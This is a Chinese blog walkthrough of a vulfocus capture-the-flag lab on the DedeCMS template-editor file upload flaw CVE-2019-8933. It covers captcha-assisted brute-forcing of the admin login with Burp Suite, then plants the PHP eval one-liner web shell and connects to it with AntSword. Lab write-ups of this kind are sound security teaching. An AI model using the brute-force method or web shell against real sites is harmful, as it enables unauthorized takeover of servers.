DedeCMS(CVE-2019-8933)

最新推荐文章于 2024-04-05 09:44:31 发布
最新推荐文章于 2024-04-05 09:44:31 发布
阅读量598 收藏 11
点赞数 16
分类专栏: 靶场 vulfocus 文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74559567/article/details/136726027
版权
本文详细描述了如何利用CVE-2019-8933漏洞对DedeCMS进行文件上传并破解验证码,包括使用Bp插件爆破密码和验证码,最终实现对后台的控制并找到安全漏洞。
摘要由CSDN通过智能技术生成

文件上传漏洞(CVE-2019-8933)

在vulfocus中的镜像管理中搜索并且下载,下载后开启环境

访问80端口的地址

在这里插入图片描述

这里需要掌握DedeCMS默认的后台登录地址就是dede

在url后添加dede目录进行访问

在这里插入图片描述

查看源代码,找到验证码的url,当然也可以右键打开验证码链接,或者直接拖就可以

在这里插入图片描述

在这里插入图片描述

然后刷新网页进行抓包

此时还需要安装一下用于爆破验证码的Bp插件captcha-killer-modified和开启本地服务识别验证码的脚本

https://github.com/f0ng/captcha-killer-modified/releases/tag/0.24.4

在这里插入图片描述

将插件添加到Bp

在这里插入图片描述

加载了即可

在这里插入图片描述

然后就可以在设置栏里看到

抓包验证码的网页后,右键发送到插件captcha-killer-modified

在这里插入图片描述

获取url的验证码,记得选上使用该插件

在这里插入图片描述

接下来就是开启本地服务识别验证码(感谢大佬提供的开源代码)

在这里插入图片描述

然后接口url就是开启服务机子的IP+8888端口

返回Bp插件界面,然后右键导入模板,填入接口url

在这里插入图片描述

就可以实现识别验证码

在这里插入图片描述

用户名猜测会有admin、root、test这些,此时只需要爆破密码和验证码

抓包

在这里插入图片描述

ctrl+i发送到响应处,选择攻击类型Pitchfork,添加要爆破的位置

在这里插入图片描述

选择payload

payload1的位置,添加常用的密码字典进行爆破

在这里插入图片描述

payload2位置,选择的是验证码的插件

在这里插入图片描述

开始攻击

密码就是在字典里面,但是我们发现并没有爆破成功,原因是请求过快,输入错误的时候网页会跳转错误页面然后再返回再次登录

所以,我们要设置请求数和时间,比较慢就可以

在这里插入图片描述

然后再次开始攻击,攻击完成后,排序长度,不一样的基本是成功的

在这里插入图片描述

爆破出密码是admin

成功登录后台

在这里插入图片描述

查找可利用的漏洞

这里可以进行文件上传

在这里插入图片描述

但是又找到了一处

在这里插入图片描述

在这里插入图片描述

此处就可能可以直接输入一句话了

<?php @eval($_POST['cmd']);?>

在这里插入图片描述

保存模板

替换网站主页

在这里插入图片描述

在这里插入图片描述

点击浏览,是可以被成功解析的,使用蚁剑进行连接

在这里插入图片描述

连接成功,接着就是找flag的时间了

在这里插入图片描述

flag-{bmha9e4a143-1a50-4b7c-9119-48e810a832f4}

Elaine-niu
关注
  • 16
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CVE-2019-7238.py
10-25
# CVE-2019-7238 Nexus Repository Manager 3 Remote Code Execution without authentication [@voidfyoo](https://twitter.com/voidfyoo)
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
dedecms recommend.php注入利用工具,DedeCMS全版本通杀SQL注入漏洞利用代码及工具
weixin_35140642的博客
03-18 538
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,相关...
dedecms 文件上传 (CVE-2019-8933
weixin_57567689的博客
10-21 710
dedecms 文件上传 (CVE-2019-8933
渗透实战:dedeCMS任意用户密码重置到内网getshell
最新发布
qq_53058639的博客
04-05 1087
DedeCMS是一款国产的开源CMS系统,具有使用简单、功能强大、可扩展性好等特点。然而,像其他CMS系统一样,DedeCMS也存在一些安全问题,其中任意密码重置漏洞是其中一个比较严重的漏洞。通过信息泄露,攻击者可以获取到网站的用户的用户名和一些敏感信息,然后通过利用任意密码重置漏洞,在不知道原密码的情况下,重置管理员账号的密码,从而获取管理员权限。接着,攻击者可以通过后台getshell,获取网站的控制权,进而进行各种恶意操作,如上传恶意文件、篡改网站内容、窃取用户信息等。
dedecms 文件上传(CVE-2019-8933
xy_wjyjw的博客
10-28 213
点击生成——更新主页HTML——主页位置——选择主页模板(浏览选择一句话木马文件)——首页模式——更新主页HTML。在内容中输入后门代码(一句话木马)
vulfocus——dedecms文件上传(CVE-2019-8933
m0_62063669的博客
09-14 627
Desdev DedeCMS(织梦内容管理系统)是一套基于PHP的开源内容管理系统(CMS),具有内容发布、内容管理、内容编辑和内容检索等功能。远程攻击者可在通过添加新模板时,将文件名../index.html更改成../index.php,利用该漏洞向uploads/目录上传.php文件并执行该文件。后台路径:/uploads/dede/ 后台密码:admin:admin。3. 模板=>默认模板管理=>新建模板。4.写入一句话木马,然后保存。6.用蚁剑连接一句话木马。5.访问一下这个文件。
漏洞复现-dedecms文件上传(CVE-2019-8933
qq_58683895的博客
10-27 881
漏洞复现-5.7SP2版本dedecms文件上传—_CVE-2019-8933
dedecms 文件上传 (CVE-2019-8933)漏洞复现
weixin_42675091的博客
09-03 3029
dedecms 文件上传 (CVE-2019-8933
CVE-2019-0708检测与修复补丁CVE-2019-0708检测与修复补丁
06-05
CVE-2019-0708检测与修复补丁 下载链接
cve-2019-11477.rar
06-20
此漏洞只支持本地检测,不支持远程检测模式,检测成功率很高,可以排查网络资产中是否存在此问题,避免此漏洞造成的DoS 问题
织梦漏洞超级利用工具
07-03
软件功能非常强大,懂的人可以拿去测试呵呵,不懂的人,你也就OUT了!~~
ioc-scanner-CVE-2019-19781:CVE-2019-19781的损害扫描程序指示器
03-12
CVE-2019-19781的损害扫描程序指示器 该存储库包含一个实用程序,用于检测与CVE-2019-19781相关的Citrix ADC设备的威胁。 该实用程序及其资源对FireEye Mandiant调查期间收集到的危害指标进行编码。 要了解更多信息...
【漏洞复现-dedecms-文件上传】vulfocus/dedecms-cve_2019_8933
10-16 3329
dedecms-文件上传】后缀
[CVE-2018-2019]-Dedecms v5.7 sp2前台文件上传漏洞代码分析
https://www.cnblogs.com/zpchcbd/
06-08 740
文章发布地址:/member/content_list.php?channelid=1 条件: 1.开放会员注册 2.权限必须是管理员 在\include\dialog\select_images_post.php中的36行 <?php //$cfg_imgtype = 'jpg|gif|png'; //echo $_GET[1]; $imgfile_name = trim(preg_r...
dedecms 漏洞_源起网——dedecms后台文件任意上传漏洞
weixin_39722917的博客
11-29 214
源起网 - 做专业.全面的网站源码模板下载站!​source.aiconvert.cn漏洞dedecms后台文件任意上传漏洞简介dedecms早期版本后台存在大量的富文本编辑器,该控件提供了一些文件上传接口,同时dedecms对上传文件的后缀类型未进行严格的限制,这导致了黑客可以上传WEBSHELL,获取网站后台权限。文件/dede/media_add.php修复打开 /dede/media_ad...
阿里云提示dedecms任意文件上传漏洞解决方法
滴水石穿
12-02 554
漏洞名称: dedecms任意文件上传漏洞 漏洞原因: dedecms早期版本后台存在大量的富文本编辑器,该控件提供了一些文件上传接口,同时dedecms对上传文件的后缀类型未进行严格的限制,这导致了黑客可以上传WEBSHELL,获取网站后台权限。 漏洞提示: 阿里云后台提示 解决方法: 1、打开“自己后台文件名/media_add.php”文件,找到第69行或者搜索代码: $fu...
Dedecms V5.7 SP2版本漏洞利用
dahege666的博客
03-07 9273
一、环境搭建 系统:Win10(64位) 工具:Phpstudy 源码:DedeCMS-V5.7-GBK-SP2-Full 二、安装phpstudy https://www.xp.cn/download.html 安装完成后.... 三、下载dedecms源码 http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5....
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-144391
07-14
你提到的 Jackson 最新反序列化漏洞是 CVE-2019-14361 和 CVE-2019-14439。这些漏洞都是与 Jackson 库中的反序列化功能相关的安全问题。 CVE-2019-14361 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据来执行任意代码。该漏洞主要影响 Jackson-databind 库的 2.9.x 版本。 CVE-2019-14439 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据来执行任意代码。该漏洞主要影响 Jackson-databind 库的 2.6.x 至 2.9.x 版本。 为了解决这些漏洞,建议开发人员尽快升级到最新版本的 Jackson-databind 库。另外,还可以考虑限制反序列化操作的使用,以减少潜在的风险。记住及时关注安全公告,并采取相应的措施来保护应用程序免受可能的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值